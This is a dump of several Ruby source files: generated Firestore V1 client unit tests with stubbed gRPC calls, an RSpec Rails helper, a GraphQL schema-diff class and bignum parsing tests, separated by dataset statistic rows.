grpc_options = {}
# Create request parameters for a unary method.
name = "hello world"
current_document = {}
delete_document_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :delete_document, name
assert_kind_of ::Google::Cloud::Firestore::V1::DeleteDocumentRequest, request
assert_equal "hello world", request["name"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Firestore::V1::Precondition), request["current_document"]
refute_nil options
end
Gapic::ServiceStub.stub :new, delete_document_client_stub do
# Create client
client = ::Google::Cloud::Firestore::V1::Firestore::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.delete_document({ name: name, current_document: current_document }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.delete_document name: name, current_document: current_document do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.delete_document ::Google::Cloud::Firestore::V1::DeleteDocumentRequest.new(name: name, current_document: current_document) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.delete_document({ name: name, current_document: current_document }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.delete_document ::Google::Cloud::Firestore::V1::DeleteDocumentRequest.new(name: name, current_document: current_document), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, delete_document_client_stub.call_rpc_count
end
end
def test_batch_get_documents
# Create GRPC objects.
grpc_response = ::Google::Cloud::Firestore::V1::BatchGetDocumentsResponse.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a server streaming method.
database = "hello world"
documents = ["hello world"]
mask = {}
transaction = "hello world"
batch_get_documents_client_stub = ClientStub.new [grpc_response].to_enum, grpc_operation do |name, request, options:|
assert_equal :batch_get_documents, name
assert_kind_of ::Google::Cloud::Firestore::V1::BatchGetDocumentsRequest, request
assert_equal "hello world", request["database"]
assert_equal ["hello world"], request["documents"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Firestore::V1::DocumentMask), request["mask"]
assert_equal "hello world", request["transaction"]
assert_equal :transaction, request.consistency_selector
refute_nil options
end
Gapic::ServiceStub.stub :new, batch_get_documents_client_stub do
# Create client
client = ::Google::Cloud::Firestore::V1::Firestore::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.batch_get_documents({ database: database, documents: documents, mask: mask, transaction: transaction }) do |response, operation|
assert_kind_of Enumerable, response
response.to_a.each do |r|
assert_kind_of ::Google::Cloud::Firestore::V1::BatchGetDocumentsResponse, r
end
assert_equal grpc_operation, operation
end
# Use named arguments
client.batch_get_documents database: database, documents: documents, mask: mask, transaction: transaction do |response, operation|
assert_kind_of Enumerable, response
response.to_a.each do |r|
assert_kind_of ::Google::Cloud::Firestore::V1::BatchGetDocumentsResponse, r
end
assert_equal grpc_operation, operation
end
# Use protobuf object
client.batch_get_documents ::Google::Cloud::Firestore::V1::BatchGetDocumentsRequest.new(database: database, documents: documents, mask: mask, transaction: transaction) do |response, operation|
assert_kind_of Enumerable, response
response.to_a.each do |r|
assert_kind_of ::Google::Cloud::Firestore::V1::BatchGetDocumentsResponse, r
end
assert_equal grpc_operation, operation
end
# Use hash object with options
client.batch_get_documents({ database: database, documents: documents, mask: mask, transaction: transaction }, grpc_options) do |response, operation|
assert_kind_of Enumerable, response
response.to_a.each do |r|
assert_kind_of ::Google::Cloud::Firestore::V1::BatchGetDocumentsResponse, r
end
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.batch_get_documents ::Google::Cloud::Firestore::V1::BatchGetDocumentsRequest.new(database: database, documents: documents, mask: mask, transaction: transaction), grpc_options do |response, operation|
assert_kind_of Enumerable, response
response.to_a.each do |r|
assert_kind_of ::Google::Cloud::Firestore::V1::BatchGetDocumentsResponse, r
end
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, batch_get_documents_client_stub.call_rpc_count
end
end
def test_begin_transaction
# Create GRPC objects.
grpc_response = ::Google::Cloud::Firestore::V1::BeginTransactionResponse.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
database = "hello world"
options = {}
begin_transaction_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :begin_transaction, name
assert_kind_of ::Google::Cloud::Firestore::V1::BeginTransactionRequest, request
assert_equal "hello world", request["database"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Firestore::V1::TransactionOptions), request["options"]
refute_nil options
end
Gapic::ServiceStub.stub :new, begin_transaction_client_stub do
# Create client
client = ::Google::Cloud::Firestore::V1::Firestore::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.begin_transaction({ database: database, options: options }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.begin_transaction database: database, options: options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.begin_transaction ::Google::Cloud::Firestore::V1::BeginTransactionRequest.new(database: database, options: options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.begin_transaction({ database: database, options: options }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.begin_transaction ::Google::Cloud::Firestore::V1::BeginTransactionRequest.new(database: database, options: options), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, begin_transaction_client_stub.call_rpc_count
end
end
def test_commit
# Create GRPC objects.
grpc_response = ::Google::Cloud::Firestore::V1::CommitResponse.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
database = "hello world"
writes = [{}]
transaction = "hello world"
commit_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :commit, name
assert_kind_of ::Google::Cloud::Firestore::V1::CommitRequest, request
assert_equal "hello world", request["database"]
assert_kind_of ::Google::Cloud::Firestore::V1::Write, request["writes"].first
assert_equal "hello world", request["transaction"]
refute_nil options
end
Gapic::ServiceStub.stub :new, commit_client_stub do
# Create client
client = ::Google::Cloud::Firestore::V1::Firestore::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.commit({ database: database, writes: writes, transaction: transaction }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.commit database: database, writes: writes, transaction: transaction do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.commit ::Google::Cloud::Firestore::V1::CommitRequest.new(database: database, writes: writes, transaction: transaction) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.commit({ database: database, writes: writes, transaction: transaction }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.commit ::Google::Cloud::Firestore::V1::CommitRequest.new(database: database, writes: writes, transaction: transaction), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, commit_client_stub.call_rpc_count
end
end
def test_rollback
# Create GRPC objects.
grpc_response = ::Google::Protobuf::Empty.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
database = "hello world"
transaction = "hello world"
rollback_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :rollback, name
assert_kind_of ::Google::Cloud::Firestore::V1::RollbackRequest, request
assert_equal "hello world", request["database"]
assert_equal "hello world", request["transaction"]
refute_nil options
end
Gapic::ServiceStub.stub :new, rollback_client_stub do
# Create client
client = ::Google::Cloud::Firestore::V1::Firestore::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.rollback({ database: database, transaction: transaction }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.rollback database: database, transaction: transaction do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.rollback ::Google::Cloud::Firestore::V1::RollbackRequest.new(database: database, transaction: transaction) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.rollback({ database: database, transaction: transaction }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.rollback ::Google::Cloud::Firestore::V1::RollbackRequest.new(database: database, transaction: transaction), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, rollback_client_stub.call_rpc_count
end
end
def test_run_query
# Create GRPC objects.
grpc_response = ::Google::Cloud::Firestore::V1::RunQueryResponse.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a server streaming method.
parent = "hello world"
structured_query = {}
transaction = "hello world"
run_query_client_stub = ClientStub.new [grpc_response].to_enum, grpc_operation do |name, request, options:|
assert_equal :run_query, name
assert_kind_of ::Google::Cloud::Firestore::V1::RunQueryRequest, request
assert_equal "hello world", request["parent"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Firestore::V1::StructuredQuery), request["structured_query"]
assert_equal :structured_query, request.query_type
assert_equal "hello world", request["transaction"]
assert_equal :transaction, request.consistency_selector
refute_nil options
end
Gapic::ServiceStub.stub :new, run_query_client_stub do
# Create client
client = ::Google::Cloud::Firestore::V1::Firestore::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.run_query({ parent: parent, structured_query: structured_query, transaction: transaction }) do |response, operation|
assert_kind_of Enumerable, response
response.to_a.each do |r|
assert_kind_of ::Google::Cloud::Firestore::V1::RunQueryResponse, r
end
assert_equal grpc_operation, operation
end
# Use named arguments
client.run_query parent: parent, structured_query: structured_query, transaction: transaction do |response, operation|
assert_kind_of Enumerable, response
response.to_a.each do |r|
assert_kind_of ::Google::Cloud::Firestore::V1::RunQueryResponse, r
end
assert_equal grpc_operation, operation
end
# Use protobuf object
client.run_query ::Google::Cloud::Firestore::V1::RunQueryRequest.new(parent: parent, structured_query: structured_query, transaction: transaction) do |response, operation|
assert_kind_of Enumerable, response
response.to_a.each do |r|
assert_kind_of ::Google::Cloud::Firestore::V1::RunQueryResponse, r
end
assert_equal grpc_operation, operation
end
# Use hash object with options
client.run_query({ parent: parent, structured_query: structured_query, transaction: transaction }, grpc_options) do |response, operation|
assert_kind_of Enumerable, response
response.to_a.each do |r|
assert_kind_of ::Google::Cloud::Firestore::V1::RunQueryResponse, r
end
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.run_query ::Google::Cloud::Firestore::V1::RunQueryRequest.new(parent: parent, structured_query: structured_query, transaction: transaction), grpc_options do |response, operation|
assert_kind_of Enumerable, response
response.to_a.each do |r|
assert_kind_of ::Google::Cloud::Firestore::V1::RunQueryResponse, r
end
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, run_query_client_stub.call_rpc_count
end
end
def test_partition_query
# Create GRPC objects.
grpc_response = ::Google::Cloud::Firestore::V1::PartitionQueryResponse.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
parent = "hello world"
structured_query = {}
partition_count = 42
page_token = "hello world"
page_size = 42
partition_query_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :partition_query, name
assert_kind_of ::Google::Cloud::Firestore::V1::PartitionQueryRequest, request
assert_equal "hello world", request["parent"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Firestore::V1::StructuredQuery), request["structured_query"]
assert_equal :structured_query, request.query_type
assert_equal 42, request["partition_count"]
assert_equal "hello world", request["page_token"]
assert_equal 42, request["page_size"]
refute_nil options
end
Gapic::ServiceStub.stub :new, partition_query_client_stub do
# Create client
client = ::Google::Cloud::Firestore::V1::Firestore::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.partition_query({ parent: parent, structured_query: structured_query, partition_count: partition_count, page_token: page_token, page_size: page_size }) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use named arguments
client.partition_query parent: parent, structured_query: structured_query, partition_count: partition_count, page_token: page_token, page_size: page_size do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.partition_query ::Google::Cloud::Firestore::V1::PartitionQueryRequest.new(parent: parent, structured_query: structured_query, partition_count: partition_count, page_token: page_token, page_size: page_size) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.partition_query({ parent: parent, structured_query: structured_query, partition_count: partition_count, page_token: page_token, page_size: page_size }, grpc_options) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.partition_query ::Google::Cloud::Firestore::V1::PartitionQueryRequest.new(parent: parent, structured_query: structured_query, partition_count: partition_count, page_token: page_token, page_size: page_size), grpc_options do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, partition_query_client_stub.call_rpc_count
end
end
def test_write
# Create GRPC objects.
grpc_response = ::Google::Cloud::Firestore::V1::WriteResponse.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a bidi streaming method.
database = "hello world"
stream_id = "hello world"
writes = [{}]
stream_token = "hello world"
labels = {}
write_client_stub = ClientStub.new [grpc_response].to_enum, grpc_operation do |name, request, options:|
assert_equal :write, name
assert_kind_of Enumerable, request
refute_nil options
request
end
Gapic::ServiceStub.stub :new, write_client_stub do
# Create client
client = ::Google::Cloud::Firestore::V1::Firestore::Client.new do |config|
config.credentials = grpc_channel
end
# Use enumerable object with hash and protobuf object.
request_hash = { database: database, stream_id: stream_id, writes: writes, stream_token: stream_token, labels: labels }
request_proto = ::Google::Cloud::Firestore::V1::WriteRequest.new database: database, stream_id: stream_id, writes: writes, stream_token: stream_token, labels: labels
enum_input = [request_hash, request_proto].to_enum
client.write enum_input do |response, operation|
assert_kind_of Enumerable, response
response.to_a.each do |r|
assert_kind_of ::Google::Cloud::Firestore::V1::WriteResponse, r
end
assert_equal grpc_operation, operation
end
# Use stream input object (from gapic-common).
request_hash = { database: database, stream_id: stream_id, writes: writes, stream_token: stream_token, labels: labels }
request_proto = ::Google::Cloud::Firestore::V1::WriteRequest.new database: database, stream_id: stream_id, writes: writes, stream_token: stream_token, labels: labels
stream_input = Gapic::StreamInput.new
client.write stream_input do |response, operation|
assert_kind_of Enumerable, response
response.to_a.each do |r|
assert_kind_of ::Google::Cloud::Firestore::V1::WriteResponse, r
end
assert_equal grpc_operation, operation
end
stream_input << request_hash
stream_input << request_proto
stream_input.close
# Use enumerable object with hash and protobuf object with options.
request_hash = { database: database, stream_id: stream_id, writes: writes, stream_token: stream_token, labels: labels }
request_proto = ::Google::Cloud::Firestore::V1::WriteRequest.new database: database, stream_id: stream_id, writes: writes, stream_token: stream_token, labels: labels
enum_input = [request_hash, request_proto].to_enum
client.write enum_input, grpc_options do |response, operation|
assert_kind_of Enumerable, response
response.to_a.each do |r|
assert_kind_of ::Google::Cloud::Firestore::V1::WriteResponse, r
end
assert_equal grpc_operation, operation
end
# Use stream input object (from gapic-common) with options.
request_hash = { database: database, stream_id: stream_id, writes: writes, stream_token: stream_token, labels: labels }
request_proto = ::Google::Cloud::Firestore::V1::WriteRequest.new database: database, stream_id: stream_id, writes: writes, stream_token: stream_token, labels: labels
stream_input = Gapic::StreamInput.new
client.write stream_input, grpc_options do |response, operation|
assert_kind_of Enumerable, response
response.to_a.each do |r|
assert_kind_of ::Google::Cloud::Firestore::V1::WriteResponse, r
end
assert_equal grpc_operation, operation
end
stream_input << request_hash
stream_input << request_proto
stream_input.close
# Verify method calls
assert_equal 4, write_client_stub.call_rpc_count
write_client_stub.requests.each do |request|
request.to_a.each do |r|
assert_kind_of ::Google::Cloud::Firestore::V1::WriteRequest, r
assert_equal "hello world", r["database"]
assert_equal "hello world", r["stream_id"]
assert_kind_of ::Google::Cloud::Firestore::V1::Write, r["writes"].first
assert_equal "hello world", r["stream_token"]
assert_equal({}, r["labels"].to_h)
end
end
end
end
def test_listen
# Create GRPC objects.
grpc_response = ::Google::Cloud::Firestore::V1::ListenResponse.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a bidi streaming method.
database = "hello world"
add_target = {}
labels = {}
listen_client_stub = ClientStub.new [grpc_response].to_enum, grpc_operation do |name, request, options:|
assert_equal :listen, name
assert_kind_of Enumerable, request
refute_nil options
request
end
Gapic::ServiceStub.stub :new, listen_client_stub do
# Create client
client = ::Google::Cloud::Firestore::V1::Firestore::Client.new do |config|
config.credentials = grpc_channel
end
# Use enumerable object with hash and protobuf object.
request_hash = { database: database, add_target: add_target, labels: labels }
request_proto = ::Google::Cloud::Firestore::V1::ListenRequest.new database: database, add_target: add_target, labels: labels
enum_input = [request_hash, request_proto].to_enum
client.listen enum_input do |response, operation|
assert_kind_of Enumerable, response
response.to_a.each do |r|
assert_kind_of ::Google::Cloud::Firestore::V1::ListenResponse, r
end
assert_equal grpc_operation, operation
end
# Use stream input object (from gapic-common).
request_hash = { database: database, add_target: add_target, labels: labels }
request_proto = ::Google::Cloud::Firestore::V1::ListenRequest.new database: database, add_target: add_target, labels: labels
stream_input = Gapic::StreamInput.new
client.listen stream_input do |response, operation|
assert_kind_of Enumerable, response
response.to_a.each do |r|
assert_kind_of ::Google::Cloud::Firestore::V1::ListenResponse, r
end
assert_equal grpc_operation, operation
end
stream_input << request_hash
stream_input << request_proto
stream_input.close
# Use enumerable object with hash and protobuf object with options.
request_hash = { database: database, add_target: add_target, labels: labels }
request_proto = ::Google::Cloud::Firestore::V1::ListenRequest.new database: database, add_target: add_target, labels: labels
enum_input = [request_hash, request_proto].to_enum
client.listen enum_input, grpc_options do |response, operation|
assert_kind_of Enumerable, response
response.to_a.each do |r|
assert_kind_of ::Google::Cloud::Firestore::V1::ListenResponse, r
end
assert_equal grpc_operation, operation
end
# Use stream input object (from gapic-common) with options.
request_hash = { database: database, add_target: add_target, labels: labels }
request_proto = ::Google::Cloud::Firestore::V1::ListenRequest.new database: database, add_target: add_target, labels: labels
stream_input = Gapic::StreamInput.new
client.listen stream_input, grpc_options do |response, operation|
assert_kind_of Enumerable, response
response.to_a.each do |r|
assert_kind_of ::Google::Cloud::Firestore::V1::ListenResponse, r
end
assert_equal grpc_operation, operation
end
stream_input << request_hash
stream_input << request_proto
stream_input.close
# Verify method calls
assert_equal 4, listen_client_stub.call_rpc_count
listen_client_stub.requests.each do |request|
request.to_a.each do |r|
assert_kind_of ::Google::Cloud::Firestore::V1::ListenRequest, r
assert_equal "hello world", r["database"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Firestore::V1::Target), r["add_target"]
assert_equal :add_target, r.target_change
assert_equal({}, r["labels"].to_h)
end
end
end
end
def test_list_collection_ids
# Create GRPC objects.
grpc_response = ::Google::Cloud::Firestore::V1::ListCollectionIdsResponse.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
parent = "hello world"
page_size = 42
page_token = "hello world"
list_collection_ids_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :list_collection_ids, name
assert_kind_of ::Google::Cloud::Firestore::V1::ListCollectionIdsRequest, request
assert_equal "hello world", request["parent"]
assert_equal 42, request["page_size"]
assert_equal "hello world", request["page_token"]
refute_nil options
end
Gapic::ServiceStub.stub :new, list_collection_ids_client_stub do
# Create client
client = ::Google::Cloud::Firestore::V1::Firestore::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.list_collection_ids({ parent: parent, page_size: page_size, page_token: page_token }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.list_collection_ids parent: parent, page_size: page_size, page_token: page_token do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.list_collection_ids ::Google::Cloud::Firestore::V1::ListCollectionIdsRequest.new(parent: parent, page_size: page_size, page_token: page_token) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.list_collection_ids({ parent: parent, page_size: page_size, page_token: page_token }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.list_collection_ids ::Google::Cloud::Firestore::V1::ListCollectionIdsRequest.new(parent: parent, page_size: page_size, page_token: page_token), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, list_collection_ids_client_stub.call_rpc_count
end
end
def test_batch_write
# Create GRPC objects.
grpc_response = ::Google::Cloud::Firestore::V1::BatchWriteResponse.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
database = "hello world"
writes = [{}]
labels = {}
batch_write_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :batch_write, name
assert_kind_of ::Google::Cloud::Firestore::V1::BatchWriteRequest, request
assert_equal "hello world", request["database"]
assert_kind_of ::Google::Cloud::Firestore::V1::Write, request["writes"].first
assert_equal({}, request["labels"].to_h)
refute_nil options
end
Gapic::ServiceStub.stub :new, batch_write_client_stub do
# Create client
client = ::Google::Cloud::Firestore::V1::Firestore::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.batch_write({ database: database, writes: writes, labels: labels }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.batch_write database: database, writes: writes, labels: labels do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.batch_write ::Google::Cloud::Firestore::V1::BatchWriteRequest.new(database: database, writes: writes, labels: labels) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.batch_write({ database: database, writes: writes, labels: labels }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.batch_write ::Google::Cloud::Firestore::V1::BatchWriteRequest.new(database: database, writes: writes, labels: labels), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, batch_write_client_stub.call_rpc_count
end
end
def test_create_document
# Create GRPC objects.
grpc_response = ::Google::Cloud::Firestore::V1::Document.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
parent = "hello world"
collection_id = "hello world"
document_id = "hello world"
document = {}
mask = {}
create_document_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :create_document, name
assert_kind_of ::Google::Cloud::Firestore::V1::CreateDocumentRequest, request
assert_equal "hello world", request["parent"]
assert_equal "hello world", request["collection_id"]
assert_equal "hello world", request["document_id"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Firestore::V1::Document), request["document"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Firestore::V1::DocumentMask), request["mask"]
refute_nil options
end
Gapic::ServiceStub.stub :new, create_document_client_stub do
# Create client
client = ::Google::Cloud::Firestore::V1::Firestore::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.create_document({ parent: parent, collection_id: collection_id, document_id: document_id, document: document, mask: mask }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.create_document parent: parent, collection_id: collection_id, document_id: document_id, document: document, mask: mask do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.create_document ::Google::Cloud::Firestore::V1::CreateDocumentRequest.new(parent: parent, collection_id: collection_id, document_id: document_id, document: document, mask: mask) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.create_document({ parent: parent, collection_id: collection_id, document_id: document_id, document: document, mask: mask }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.create_document ::Google::Cloud::Firestore::V1::CreateDocumentRequest.new(parent: parent, collection_id: collection_id, document_id: document_id, document: document, mask: mask), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, create_document_client_stub.call_rpc_count
end
end
def test_configure
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
client = block_config = config = nil
Gapic::ServiceStub.stub :new, nil do
client = ::Google::Cloud::Firestore::V1::Firestore::Client.new do |config|
config.credentials = grpc_channel
end
end
config = client.configure do |c|
block_config = c
end
assert_same block_config, config
assert_kind_of ::Google::Cloud::Firestore::V1::Firestore::Client::Configuration, config
end
end
| 43.315556 | 301 | 0.713195 |
87857eab7ec67260b7720954340edd4c5723dd8f | 2,522 | ENV['RAILS_ENV'] ||= 'test'
require 'spec_helper'
require File.expand_path('../../config/environment', __FILE__)
require 'capybara/rails'
require 'rspec/rails'
require 'sidekiq/testing'
Sidekiq::Testing.fake!
# Add additional requires below this line. Rails is not loaded until this point!
# Requires supporting ruby files with custom matchers and macros, etc, in
# spec/support/ and its subdirectories. Files matching `spec/**/*_spec.rb` are
# run as spec files by default. This means that files in spec/support that end
# in _spec.rb will both be required and run as specs, causing the specs to be
# run twice. It is recommended that you do not name files matching this glob to
# end with _spec.rb. You can configure this pattern with the --pattern
# option on the command line or in ~/.rspec, .rspec or `.rspec-local`.
#
# The following line is provided for convenience purposes. It has the downside
# of increasing the boot-up time by auto-requiring all files in the support
# directory. Alternatively, in the individual `*_spec.rb` files, manually
# require only the support files necessary.
#
# Dir[Rails.root.join('spec/support/**/*.rb')].each { |f| require f }
# Checks for pending migration and applies them before tests are run.
# If you are not using ActiveRecord, you can remove this line.
# users commonly want.
ActiveRecord::Migration.maintain_test_schema!
RSpec.configure do |config|
config.include Capybara::DSL
# Remove this line if you're not using ActiveRecord or ActiveRecord fixtures
# Remove this line if you're not using ActiveRecord or ActiveRecord fixtures
config.include FactoryGirl::Syntax::Methods
config.fixture_path = "#{::Rails.root}/spec/fixtures"
# If you're not using ActiveRecord, or you'd prefer not to run each of your
# examples within a transaction, remove the following line or assign false
# instead of true.
config.use_transactional_fixtures = true
# RSpec Rails can automatically mix in different behaviours to your tests
# based on their file location, for example enabling you to call `get` and
# `post` in specs under `spec/controllers`.
#
# You can disable this behaviour by removing the line below, and instead
# explicitly tag your specs with their type, e.g.:
#
# RSpec.describe UsersController, :type => :controller do
# # ...
# end
#
# The different available types are documented in the features, such as in
# https://relishapp.com/rspec/rspec-rails/docs
config.infer_spec_type_from_file_location!
end | 43.482759 | 80 | 0.748216 |
e2b516a3d546a321609d60217febdecd8cb946f1 | 995 | module GraphQL
module SchemaComparator
module Diff
class DirectiveArgument
def initialize(directive, old_arg, new_arg)
@directive = directive
@old_arg = old_arg
@new_arg = new_arg
end
def diff
changes = []
if old_arg.description != new_arg.description
changes << Changes::DirectiveArgumentDescriptionChanged.new(directive, old_arg, new_arg)
end
if old_arg.default_value != new_arg.default_value
changes << Changes::DirectiveArgumentDefaultChanged.new(directive, old_arg, new_arg)
end
if old_arg.type.to_type_signature != new_arg.type.to_type_signature
changes << Changes::DirectiveArgumentTypeChanged.new(directive, old_arg, new_arg)
end
# TODO directives on directive arguments
changes
end
private
attr_reader(:directive, :new_arg, :old_arg)
end
end
end
end
| 26.184211 | 100 | 0.627136 |
f77641b35037791a00bdc24a5325202b7163d136 | 835 | require 'test/unit'
require "-test-/bignum"
class TestBignum < Test::Unit::TestCase
class TestStr2big < Test::Unit::TestCase
SIZEOF_BDIGITS = Bignum::SIZEOF_BDIGITS
BITSPERDIG = Bignum::BITSPERDIG
BDIGMAX = (1 << BITSPERDIG) - 1
def test_str2big_poweroftwo
s = "1" + "0" * 1000
n = 16 ** 1000
assert_equal(n, s.str2big_poweroftwo(16, true))
end
def test_str2big_normal
s = "1" + "0" * 1000
n = 10 ** 1000
assert_equal(n, s.str2big_normal(10, true))
end
def test_str2big_karatsuba
s = "1" + "0" * 1000
n = 10 ** 1000
assert_equal(n, s.str2big_karatsuba(10, true))
end
def test_str2big_gmp
s = "1" + "0" * 1000
n = 10 ** 1000
assert_equal(n, s.str2big_gmp(10, true))
rescue NotImplementedError
end
end
end
| 21.973684 | 53 | 0.60479 |
